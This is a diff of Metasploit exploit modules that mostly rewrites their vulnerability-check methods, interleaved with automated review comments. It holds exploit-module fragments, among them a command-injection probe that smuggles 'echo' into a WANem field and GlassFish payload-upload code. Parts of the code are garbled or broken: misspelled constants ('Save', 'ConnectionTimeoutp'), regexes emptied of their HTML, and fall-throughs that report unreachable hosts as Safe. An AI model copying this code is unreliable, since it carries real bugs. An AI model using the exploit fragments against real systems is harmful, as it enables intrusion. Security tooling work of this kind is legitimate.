diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index 3ea050d12a..1b9ffd0f7b 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -128,12 +128,17 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "interface", "/"), }) - if res and res.body =~ /var currentMutinyVersion = "Version ([0-9\.-]*)/ + if res.nil? + vprint_error("Connection timed out") + return Exploit::CheckCode::Unknown + end + + if res.body =~ /var currentMutinyVersion = "Version ([0-9\.-]*)/ version = $1 end if version and version >= "5" and version <= "5.0-1.07" - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index 0b2d857f61..8ca4131d31 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -88,10 +88,11 @@ class Metasploit4 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end # diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index 6b811fb3bd..b1542c492e 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from login page - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") begin res = send_request_cgi({ 'uri' => '/' 
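Review bot: Moving `return Exploit::CheckCode::Unknown` into the rescue clause and making `Exploit::CheckCode::Safe` the fall-through changes what an inconclusive probe reports: every path that leaves the `begin` block without returning — including a nil or unrecognised response that raises no exception — is now labelled Safe rather than Unknown. The head of this `begin` block is outside the hunk so I cannot see how `res` is handled here, but in the zen_load_balancer_exec hunk below the guard is `if res and res.code == 200 ...`, so a read timeout that yields nil now reads as Safe. The same rewrite appears in openfiler_networkcard_exec and zen_load_balancer_exec; adding `return Exploit::CheckCode::Unknown if res.nil?` before the fall-through, or returning Safe only on a recognised non-vulnerable response, would keep the two outcomes distinct. The enclosing `check` method begins outside the hunk.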
@@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown - + return Exploit::CheckCode::Safe end def on_new_session(client) diff --git a/modules/exploits/linux/http/pineapp_livelog_exec.rb b/modules/exploits/linux/http/pineapp_livelog_exec.rb index 4d13b0dcbd..f76a7463ba 100644 --- a/modules/exploits/linux/http/pineapp_livelog_exec.rb +++ b/modules/exploits/linux/http/pineapp_livelog_exec.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'nsserver' => Rex::Text.encode_base64("127.0.0.1") } }) - if res and res.code == 200 and res.body =~ /NS Query result for 127.0.0.1/ + if res and res.code == 200 and res.body =~ /NS Query result for 127\.0\.0\.1/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 5266a5669e..693c4f991f 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end def target_smt_x9_214 diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 5ed6644527..2e8d2c1359 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb 
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("#{peer} - Trying to detect installed version") + vprint_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -80,21 +80,21 @@ class Metasploit3 < Msf::Exploit::Remote model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else - print_status("#{peer} - Detection failed") + vprint_status("#{peer} - Detection failed") return Exploit::CheckCode::Unknown end - print_status("#{peer} - Model #{model} with version #{version}-#{build} detected") + vprint_status("#{peer} - Model #{model} with version #{version}-#{build} detected") case version when '4.0' - return Exploit::CheckCode::Vulnerable if build < '2259' + return Exploit::CheckCode::Appears if build < '2259' when '4.1' - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears when '4.2' - return Exploit::CheckCode::Vulnerable if build < '3243' + return Exploit::CheckCode::Appears if build < '3243' when '4.3' - return Exploit::CheckCode::Vulnerable if build < '3810' + return Exploit::CheckCode::Appears if build < '3810' return Exploit::CheckCode::Detected if build == '3810' end diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 1a64359162..e50c966fed 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode("echo #{fingerprint}") data << "%26" - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") begin res = send_request_cgi({ 
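Review bot: `return Exploit::CheckCode::Appears if build < '2259'` and the following `'3243'` and `'3810'` comparisons order build numbers as strings, so a build with a different digit count is misjudged — a constructed `'999'` is not `< '2259'` lexicographically, while `'10000'` is `< '3810'`. If `build` is the digit string the regex outside the hunk appears to capture, `build.to_i < 2259` (and `build.to_i == 3810` for the Detected case) compares numerically. A short comment on `case version` naming the fixed build for each branch would also spare the next maintainer a trip to the advisory; the start of `check` is outside the hunk.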
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index c0665dd1a1..2fe8f0116e 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "#{uri}/login.php" }) - if res and res.body =~ /WebCalendar v1.2.\d/ - return Exploit::CheckCode::Vulnerable + if res and res.body =~ /WebCalendar v1\.2\.\d/ + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index 2d7a564c1d..ca19fb5a97 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + vprint_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/ version = $1 - print_status("#{peer} - Zabbix version #{version} detected") + vprint_status("#{peer} - Zabbix version #{version} detected") else # If this fails, guest access may not be enabled - print_status("#{peer} - Unable to access httpmon.php") + vprint_status("#{peer} - Unable to access httpmon.php") return Exploit::CheckCode::Unknown end 
diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index fe82b999be..96e02f8cbf 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -66,23 +66,23 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from config file - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") begin res = send_request_cgi({ 'uri' => '/config/global.conf' }) - if res and res.code == 200 and res.body =~ /#version ZEN\s+\$version=\"(2|3\.0\-rc1)/ + if res and res.code == 200 and res.body =~ /#version ZEN\s+\$version=\"(2|3\.0\-rc1)/ return Exploit::CheckCode::Appears elsif res and res.code == 200 and res.body =~ /zenloadbalancer/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown - + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 361d8d9ec4..a0103295ed 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => "GET", 'uri' => "/zport/acl_users/cookieAuthHelper/login_form" }) - return Exploit::CheckCode::Vulnerable if res.body =~ /
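Review bot: The new fall-through `return Exploit::CheckCode::Safe` also fires when send_request_cgi returns nil without raising (the rescue covers only the three Rex connection errors), because neither `if res and res.code == 200` branch matches a nil res; a host that simply did not answer is then reported as not vulnerable. Keep a missing response as Unknown with `return Exploit::CheckCode::Unknown unless res` right after the request. The same fall-through is introduced by the extplorer_upload_exec.rb and kordil_edms_upload_exec.rb hunks, and the first hunk of this chunk, whose file header is not visible, appears to follow the same pattern.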

Copyright © 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+3\./ + return Exploit::CheckCode::Appears if res.body =~ /

Copyright © 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+3\./ return Exploit::CheckCode::Detected if res.body =~ // return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown - + return Exploit::CheckCode::Save end def exploit diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index 58b8b6bda2..54902a92d6 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect - if (banner =~ /IMAP4rev1 v12.264/) - return Exploit::CheckCode::Vulnerable + if (banner =~ /IMAP4rev1 v12\.264/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb index c73a8a4f4d..8c55d1c094 100644 --- a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb +++ b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb @@ -62,7 +62,7 @@ class Metasploit4 < Msf::Exploit::Local return CheckCode::Detected end - return CheckCode::Unknown + return CheckCode::Safe end def exploit diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index 9b8aa1f9f4..8ae3c846ea 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -57,7 +57,7 @@ class Metasploit4 < Msf::Exploit::Local def check if setuid?("/usr/bin/vmware-mount") - CheckCode::Vulnerable + CheckCode::Appears else CheckCode::Safe end diff --git a/modules/exploits/linux/local/zpanel_zsudo.rb b/modules/exploits/linux/local/zpanel_zsudo.rb index 36032a4178..f5e2792116 100644 --- a/modules/exploits/linux/local/zpanel_zsudo.rb 
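Review bot: `return Exploit::CheckCode::Save` on the new side names a constant that does not exist — CheckCode has Safe, not Save — so the non-matching path raises NameError instead of returning a result; it should read `return Exploit::CheckCode::Safe`. The rescue list on the context line above, `::Rex::ConnectionTimeoutp`, is misspelled the same way and will itself raise NameError the first time a connection error is matched against it. `res.body` is also read without checking that send_request_cgi returned a response, and a nil res is not among the rescued classes; `return Exploit::CheckCode::Unknown unless res` before the first regex covers that (the same unguarded `res.body` is on the new side of the cuteflow_upload_exec.rb and hyperic_hq_script_console.rb hunks). The check method begins before this hunk.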
+++ b/modules/exploits/linux/local/zpanel_zsudo.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Exploit::Local return CheckCode::Detected end - return CheckCode::Unknown + return CheckCode::Safe end def exploit diff --git a/modules/exploits/linux/misc/hp_vsa_login_bof.rb b/modules/exploits/linux/misc/hp_vsa_login_bof.rb index adbecb1bbd..64ac53e265 100644 --- a/modules/exploits/linux/misc/hp_vsa_login_bof.rb +++ b/modules/exploits/linux/misc/hp_vsa_login_bof.rb @@ -70,13 +70,13 @@ class Metasploit3 < Msf::Exploit::Remote def check connect packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"") - print_status("#{rhost}:#{rport} Sending login packet to check...") + vprint_status("#{rhost}:#{rport} Sending login packet to check...") sock.put(packet) res = sock.get_once disconnect if res and res=~ /OK/ and res =~ /Login/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif res and res =~ /FAILED/ and res =~ /version/ return Exploit::CheckCode::Detected end diff --git a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb index f96767e3bd..814fded403 100644 --- a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb +++ b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("Checking if remote NRPE supports command line arguments") + vprint_status("Checking if remote NRPE supports command line arguments") begin # send query asking to run "fake_check" command with command substitution in arguments @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe rescue Errno::ECONNRESET => reset unless datastore['NRPESSL'] or @force_ssl - print_status("Retrying with ADH SSL") + vprint_status("Retrying with ADH SSL") @force_ssl = true retry end 
diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb index 17a91d77df..8625e5baff 100644 --- a/modules/exploits/linux/misc/sercomm_exec.rb +++ b/modules/exploits/linux/misc/sercomm_exec.rb @@ -141,14 +141,14 @@ class Metasploit3 < Msf::Exploit::Remote case fprint when 'BE' - print_status("Detected Big Endian") - return Msf::Exploit::CheckCode::Vulnerable + vprint_status("Detected Big Endian") + return Msf::Exploit::CheckCode::Appears when 'LE' - print_status("Detected Little Endian") - return Msf::Exploit::CheckCode::Vulnerable + vprint_status("Detected Little Endian") + return Msf::Exploit::CheckCode::Appears end - return Msf::Exploit::CheckCode::Unknown + return Msf::Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 384e496d42..95cc260886 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -82,17 +82,17 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo #{clue}" connect - print_status("#{peer} - Sending 'Command' request...") + vprint_status("#{peer} - Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect if res - print_status(res) + vprint_status(res) if res =~ /#{clue}/ return Exploit::CheckCode::Vulnerable elsif res =~ /-1/ and res=~ /NODE (\d*)/ node_id = $1 - print_good("#{peer} - Node ID #{node_id} discovered") + vprint_good("#{peer} - Node ID #{node_id} discovered") else return Exploit::CheckCode::Safe end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retry with the good node_id connect - print_status("#{peer} - Sending 'Command' request with discovered Node ID...") + vprint_status("#{peer} - Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /#{clue}/ 
diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index 3515686a94..5d4dfab9da 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote version = postgres_fingerprint if version[:auth] - return CheckCode::Vulnerable + return CheckCode::Appears else print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" return CheckCode::Safe diff --git a/modules/exploits/linux/samba/setinfopolicy_heap.rb b/modules/exploits/linux/samba/setinfopolicy_heap.rb index eb465fbe83..66c7d88f19 100644 --- a/modules/exploits/linux/samba/setinfopolicy_heap.rb +++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb @@ -282,7 +282,7 @@ class Metasploit3 < Msf::Exploit::Remote version = smb_peer_lm().scan(/Samba (\d\.\d.\d*)/).flatten[0] minor = version.scan(/\.(\d*)$/).flatten[0].to_i - print_status("Version found: #{version}") + vprint_status("Version found: #{version}") return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16 return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14 diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index e37e619ff1..1ede0f8401 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote ret = connect_login # We just want the banner to check against our targets.. - print_status("FTP Banner: #{banner.strip}") + vprint_status("FTP Banner: #{banner.strip}") status = Exploit::CheckCode::Safe if banner =~ /Version wu-2\.(4|5)/ status = Exploit::CheckCode::Appears diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb index 4479a5a824..80a45a69ca 100644 
--- a/modules/exploits/multi/http/activecollab_chat.rb +++ b/modules/exploits/multi/http/activecollab_chat.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote if (cms and cms.body =~ /powered by activeCollab/) # detect the chat module if (chat and chat.code == 200) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 17e624a4f4..8c4c848762 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index 8fd8f46545..cea0579de2 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php") }) if res and res.body =~ /\Pet Rate Admin \- Banner Manager\<\/title\>/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index 38ad1d8c45..c68da26ec9 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -88,6 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end 
@@ -95,19 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote res.body.to_s =~ /Data Center Network Manager/ and res.body.to_s =~ /

Version: (.*)<\/div>/ version = $1 - print_status("Cisco Primer Data Center Network Manager version #{version} found") - elsif res.code == 200 and - res.body.to_s =~ /Data Center Network Manager/ + vprint_status("Cisco Primer Data Center Network Manager version #{version} found") + if version =~ /6\.1/ + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Detected + end + + elsif res.code == 200 and res.body.to_s =~ /Data Center Network Manager/ return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe end - if version =~ /6\.1/ - return Exploit::CheckCode::Vulnerable - end - - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index f4fe327e7b..c9f935683a 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - print_good "#{peer} - Administrator access available" + vprint_good "#{peer} - Administrator access available" else return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote imghash = "596b3fc4f1a0b818979db1cf94a82220" if img == imghash - print_good "#{peer} - ColdFusion 9 Detected" + vprint_good "#{peer} - ColdFusion 9 Detected" else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index c1003f7717..dd1474d71b 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb 
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.body =~ /\Version 2\.11\.2\<\/strong\>\/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif res.body =~ /\/ return Exploit::CheckCode::Detected else diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index ca37ae8fc1..c8646fe686 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote res = execute_php_code("phpinfo();die();") if not res or res.code != 200 - print_error("Failed: Error requesting page") + vprint_error("Failed: Error requesting page") return CheckCode::Unknown end diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 979bcf7497..a21b89ecc7 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res.body =~ /2\.1\.(0RC\d|0|1|2)<\/version>/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end if res.body =~ /eXtplorer/ @@ -79,9 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 5a1dc2b17b..7115369187 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb 
@@ -364,7 +364,16 @@ class Metasploit3 < Msf::Exploit::Remote # # Return POST data and data length, based on GlassFish edition # - def get_upload_data(boundary, version, war, app_base, typefield='', status_checkbox='', start='', viewstate='') + def get_upload_data(opts = {}) + boundary = opts[:boundary] + version = opts[:version] + war = opts[:war] + app_base = opts[:app_base] + typefield = opts[:typefield] + status_checkbox = opts[:status_checkbox] + start = opts[:start] + viewstate = opts[:viewstate] + data = '' if version == '3.0' @@ -501,7 +510,14 @@ class Metasploit3 < Msf::Exploit::Remote # Upload our payload, and execute it. This function will also try to automatically # clean up after itself. # - def upload_exec(session, app_base, jsp_name, target, war, edition, version) + def upload_exec(opts = {}) + session = opts[:session] + app_base = opts[:app_base] + jsp_name = opts[:jsp_name] + war = opts[:war] + edition = opts[:edition] + version = opts[:version] + if version == '2.x' or version == '9.x' path = "/applications/upload.jsf?appType=webApp" res = send_request(path, @verbs['GET'], session) @@ -553,7 +569,16 @@ class Metasploit3 < Msf::Exploit::Remote ctype = "multipart/form-data; boundary=---------------------------#{boundary}" end - post_data = get_upload_data(boundary, version, war, app_base, typefield, status_checkbox, start, viewstate) + post_data = get_upload_data({ + :boundary => boundary, + :version => version, + :war => war, + :app_base => app_base, + :typefield => typefield, + :status_checkbox => status_checkbox, + :start => start, + :viewstate => viewstate + }) #Upload our payload if version == '2.x' or version == '9.x' 
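Review bot: The options-hash signature drops the `''` defaults the old `get_upload_data` had for typefield, status_checkbox, start and viewstate: `opts[:typefield]` is nil whenever a caller omits the key. Whether nil is harmless depends on how the values are used in the body, which continues past the hunk (string interpolation turns nil into "", but a method call on it would not); `opts.fetch(:typefield, '')`, and the same for the other three, keeps the old contract. The header comment above the method should also list the keys now that the signature no longer does, e.g. a `@param opts [Hash]` line naming :boundary, :version, :war, :app_base, :typefield, :status_checkbox, :start and :viewstate; the upload_exec hunk has the same documentation gap for :session, :app_base, :jsp_name, :war, :edition and :version.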
@@ -816,7 +841,14 @@ class Metasploit3 < Msf::Exploit::Remote #Upload, execute, cleanup, winning print_status("Uploading payload...") - res = upload_exec(session, app_base, jsp_name, mytarget, war, edition, version) + res = upload_exec({ + :session => session, + :app_base => app_base, + :jsp_name => jsp_name, + :war => war, + :edition => edition, + :version => version + }) else print_error("#{my_target_host()} - GlassFish - Failed to authenticate login") end diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index c224aac3f1..0a9bf7ad39 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -59,18 +59,18 @@ class Metasploit3 < Msf::Exploit::Remote res = login(base, user, pass) if res if res.code == 200 - print_error("#{peer} - Authentication failed") + vprint_error("#{peer} - Authentication failed") return Exploit::CheckCode::Unknown elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ - print_good("#{peer} - Authenticated successfully") + vprint_good("#{peer} - Authenticated successfully") return Exploit::CheckCode::Appears end end - return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/glpi_install_rce.rb b/modules/exploits/multi/http/glpi_install_rce.rb index 5675201e41..93d2f48df8 100644 --- a/modules/exploits/multi/http/glpi_install_rce.rb +++ b/modules/exploits/multi/http/glpi_install_rce.rb 
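Review bot: A connection failure now ends in `return Exploit::CheckCode::Safe`: the rescue clause only logs with vprint_error and then falls through to the return at the bottom of the method, whereas the removed line returned Unknown after the rescue. Add `return Exploit::CheckCode::Unknown` after the vprint_error inside the rescue, as the other modules in this commit do. A nil result from login also falls through to Safe; `return Exploit::CheckCode::Unknown unless res` keeps that case distinct. The begin block starts before this hunk.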
@@ -69,10 +69,10 @@ class Metasploit3 < Msf::Exploit::Remote m = Regexp.new(re, Regexp::IGNORECASE) matched = m.match(res.body) if matched and matched[3] =~ /0.(8[0-4].[0-1])|([0-7][0-9].[0-9])/ - print_good("Detected Version : #{matched[3]}") + vprint_good("Detected Version : #{matched[3]}") return Exploit::CheckCode::Appears elsif matched - print_error("Version #{matched[3]} is not vulnerable") + vprint_error("Version #{matched[3]} is not vulnerable") end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 3fee6ed245..581fbce608 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -77,12 +77,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_command(cmd) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end if res.code == 200 && res.body =~ /#{sig}/ - print_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'") + vprint_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'") return Exploit::CheckCode::Vulnerable end diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index dbca321677..19c9a442ed 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb 
